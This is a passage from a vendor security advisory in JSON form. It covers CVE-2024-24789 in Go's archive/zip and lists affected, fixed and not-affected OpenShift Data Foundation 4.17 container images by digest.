"title": "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON"
},
{
"cve": "CVE-2024-24789",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2024-06-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2292668"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Incorrect handling of certain ZIP files",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
